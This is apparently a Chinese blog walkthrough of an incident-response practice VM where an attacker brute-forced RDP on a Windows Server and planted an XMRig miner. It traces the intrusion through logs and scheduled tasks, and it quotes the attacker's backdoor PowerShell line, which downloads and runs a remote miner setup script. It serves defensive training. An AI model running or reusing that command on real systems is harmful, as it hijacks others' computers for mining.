应急响应靶机练习-WindowsServer挖矿

一、挑战内容

  1. 攻击者的IP地址
  2. 攻击者开始攻击的时间
  3. 攻击者攻击的端口
  4. 挖矿程序的md5
  5. 后门脚本的md5
  6. 矿池地址
  7. 钱包地址
  8. 攻击者是如何攻击进入的

二、环境准备

账号密码:Administrator / zgsf@123

使用vmware直接打开即可,登录后会提示安装vmwaretool,安装后图形化界面会好看很多,重启后后生效。

三、开始

1.挑战一

没有发现该服务器存在web服务,可能是通过rdp远程登录进来的,需要查看日志确认。

win+r,然后输入eventvwr打开日志

查看安全日志

筛选id为4625的事件(账户登录失败,检测是否存在暴力破解)

PS:
系统日志(System)
6005:表示系统日志服务已启动,通常用于判断系统是否正常启动。
6006:表示系统日志服务已停止,通常用于判断系统是否正常关机。
6009:表示系统非正常关机,例如通过按 Ctrl+Alt+Delete 强制关机。
41:表示系统在未正常关机的情况下重新启动,常见于意外断电或系统崩溃。
1074:记录系统关机、重启的时间及原因。
7045:表示服务创建成功。
7030:表示服务创建失败。
安全日志(Security)
4624:账户成功登录。
4625:账户登录失败,可用于检测暴力破解攻击。
4634:账户被注销。
4647:用户发起注销。
4648:试图使用明确的凭证登录,可用于查看远程登录相关信息,如远程登录的 IP 地址。
4672:授予特殊权限。
4720:创建用户。
4726:删除用户。
4732:将成员添加到启用安全的本地组中。
4733:将成员从启用安全的本地组中移除。
应用程序日志(Application)
1116:反恶意软件平台检测到恶意软件或其他可能不需要的软件。
其他日志
104:记录所有审计日志清除事件。
4199:TCP/IP 地址冲突。
4800:工作站被锁定。
4801:工作站被解锁。

发现短时间内存在大量登录失败记录,确认存在暴力破解行为

点进去可以发现攻击者IP为192.168.115.131(ps:20:17分的记录没看到 ip,应该不是破解的日志,要看25分的记录)

 

2.挑战二 

开始攻击的时间就是上面第一条失败的记录,2024/5/21 20:25:22

3.挑战三 

筛选id为4624的事件(登录成功),发现攻击者ip成功登录

结合端口开放情况,基本可以判定攻击者对rdp端口进行暴力破解,因此攻击的端口为3389

4.挑战四 

如果存在挖矿程序,cpu、gpu、内存啥的使用率会比较高,crtl+shift+esc打开任务管理器查看使用情况,发现存在一个程序占用内存较多(ps:这个的占用情况跟设置的虚拟机配置有关,关注相对占比即可,无需关注绝对占比)

查看详情,发现创建时间就是攻击者成功登录后几分钟

查询后确认这就是挖矿程序

使用命令计算MD5值,为a79d49f425f95e70ddf0c68c18abc564

C:\Users\Administrator>cd C:\Users\Administrator\c3pool

C:\Users\Administrator\c3pool>dir
 驱动器 C 中的卷没有标签。
 卷的序列号是 440A-D872

 C:\Users\Administrator\c3pool 的目录

2024/05/21  20:32    <DIR>          .
2025/03/16  15:04    <DIR>          ..
2025/03/16  15:10             4,688 config.json
2024/05/21  20:32             2,726 config_background.json
2024/05/21  20:32               337 miner.bat
2017/04/26  15:14           368,640 nssm.exe
2025/03/16  15:05                 0 stderr
2025/03/16  15:05                 0 stdout
2024/04/29  17:46            14,544 WinRing0x64.sys
2024/04/29  17:46         6,497,280 xmrig.exe
2025/03/16  16:22            27,018 xmrig.log
               9 个文件      6,915,233 字节
               2 个目录 46,483,034,112 可用字节

C:\Users\Administrator\c3pool>certutil -hashfile xmrig.exe MD5
MD5 的 xmrig.exe 哈希:
a79d49f425f95e70ddf0c68c18abc564
CertUtil: -hashfile 命令成功完成。

5.挑战五 

 后门脚本可能在计划任务中,输入taskschd.msc,查看计划任务程序

 在systemTesst中发现该任务启动一个奇怪的bat文件

打开发现里面就是后门脚本

powershell -Command "$wc = New-Object System.Net.WebClient; 
$tempfile = [System.IO.Path]::GetTempFileName(); 
$tempfile += '.bat'; $wc.DownloadFile('https://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.bat', $tempfile); 
& $tempfile 4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y; 
Remove-Item -Force $tempfile"

使用相同的方法计算MD5,值为8414900f4c896964497c2cf6552ec4b9

C:\Users\Administrator\AppData>dir
 驱动器 C 中的卷没有标签。
 卷的序列号是 440A-D872

 C:\Users\Administrator\AppData 的目录

2025/03/16  15:04    <DIR>          ..
2025/03/16  15:04    <DIR>          Local
2024/05/21  19:53    <DIR>          LocalLow
2024/05/21  20:17    <DIR>          Roaming
2024/05/21  20:30               374 systems.bat
               1 个文件            374 字节
               4 个目录 46,480,056,320 可用字节

C:\Users\Administrator\AppData>certutil -hashfile systems.bat MD5
MD5 的 systems.bat 哈希:
8414900f4c896964497c2cf6552ec4b9
CertUtil: -hashfile 命令成功完成。

C:\Users\Administrator\AppData>

6.挑战六 、挑战七

 前面发现挖矿程序的目录在c3pool,进入目录查看发现存在config配置文件

  

发现可疑字段

参数配置说明

1. 网络相关参数
-o 或 --url:指定挖矿池的 URL。
-u 或 --user:挖矿池的用户名,通常是你的钱包地址。
-p 或 --pass:挖矿池的密码,通常为 x 或其他自定义密码。
--tls:启用 SSL/TLS 支持(需要挖矿池支持)。
--nicehash:启用 NiceHash 模式。
--rig-id:为挖矿池统计设置的 ID(需要挖矿池支持)。
2. 挖矿算法相关参数
-a 或 --algo:指定挖矿算法,如 cryptonight、randomx 等。
--coin:指定挖矿的加密货币,而不是直接指定算法。
--variant:指定算法的变体,例如 -1 表示自动检测,0 表示旧版本算法,1 表示新版本算法。
3. CPU 挖矿相关参数
--no-cpu:禁用 CPU 挖矿。
-t 或 --threads:指定 CPU 线程数。
--cpu-priority:设置进程优先级(0 表示空闲,2 表示正常,5 表示最高)。
--cpu-affinity:设置进程与 CPU 核心的亲和性。
--randomx-no-numa:禁用 RandomX 的 NUMA 支持。
4. 其他配置参数
--donate-level:设置捐赠级别,默认为 5%。
--retries:在切换到备份服务器之前重试的次数。
--retry-pause:重试之间的暂停时间。
--print-time:每隔多少秒打印一次哈希率报告。
--log-file:将所有输出记录到指定的日志文件。

所以矿池地址为auto.c3pool.org 

 钱包地址为4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y

7.挑战八 

由上面的分析,攻击者使用暴力破解rdp3389进行远程连接进入。

四、验证

运行桌面的程序

吐槽:这个程序如果输入一次错误,直接退出了,又得重新从头输入一遍,还是MD5需要输入大写,也没有明确的提示。

欢迎使用 知攻善防实验室 解题系统
在解题之前,请先确保您得到以下答案:
1.攻击者开始攻击的时间
2.攻击者的ip地址
3.攻击者攻击的端口
4.挖矿程序的md5
5.后门脚本的md5
6.矿池地址(仅域名)
7.攻击者的钱包地址
8.攻击者是如何攻击进入的
你准备好了吗?(y/n):y
请输入攻击者开始攻击的时间(格式:xxxx-xx-xx xx:xx:xx):2024-05-21 20:25:22
正确!!!
请输入攻击者的IP地址:192.168.115.131
正确!!!
请输入攻击者攻击的端口(格式:xxxx):3389
正确!!!
请输入挖矿程序的md5:A79D49F425F95E70DDF0C68C18ABC564
正确!!!
请输入后门程序md5:8414900F4C896964497C2CF6552EC4B9
正确!!!
请输入矿池地址(仅顶级域名):c3pool.org
正确!!!
请输入攻击者钱包地址:4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y
正确!!!
请输入攻击者是如何攻击进入的(格式:XXXX):暴力破解
正确!!!
恭喜你,您已成功攻克此靶机
恭喜你,您已成功攻克此靶机
恭喜你,您已成功攻克此靶机
恭喜你,您已成功攻克此靶机
恭喜你,您已成功攻克此靶机

### 关于应急响应靶机练习中的Web3资源 在进行应急响应靶机练习时,针对Web3技术的学习和实践尤为重要。对于希望深入理解并掌握Web3安全性的个人而言,可以从以下几个方面获取相关资源和支持。 #### Web3应急响应靶机介绍 为了更好地理解和应对Web3环境下的攻击模式和技术手段,可以利用专门设计用于模拟真实世界网络攻击场景的虚拟实验室——即所谓的“靶机”。这类平台允许参与者在一个受控环境中测试自己的技能,并通过解决实际问题来提高技术水平[^2]。 #### 获取Web3应急响应靶机的方法 有多种途径可以获得适合做Web3应急响应训练的靶机- **官方渠道**:一些知名的CTF竞赛网站会不定期发布基于区块链或去中心化应用(DApps)构建的任务挑战赛;这些活动通常伴随着详细的文档说明以及必要的安装包下载链接。 - **社区分享**:活跃的技术交流平台上经常会有开发者上传自己制作的小型实验项目供他人参考学习。例如,在优快云博客上就有作者提供了名为`windows-web3`的一系列教程及其配套使用的镜像文件下载地址。 ```bash wget https://pan.quark.cn/s/1fb45a02f814 -O windows-web3.zip unzip windows-web3.zip ``` #### 学习路径建议 除了直接参与具体的攻防演练外,还应该注重理论知识体系的建设。这包括但不限于熟悉常见的智能合约漏洞类型、Solidity编程语言特性等基础知识。同时也要关注行业动态和发展趋势,及时更新自身的认知框架[^1]。 #### 实战技巧总结 当面对复杂的Web3应用场景时,有效的分析方法论不可或缺。这里列举几个实用性强的原则作为参考: - 始终保持怀疑态度对待任何未经验证的信息输入; - 对每一行代码都执行严格的审计流程; - 积极参加各类线上线下培训课程以拓宽视野范围。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值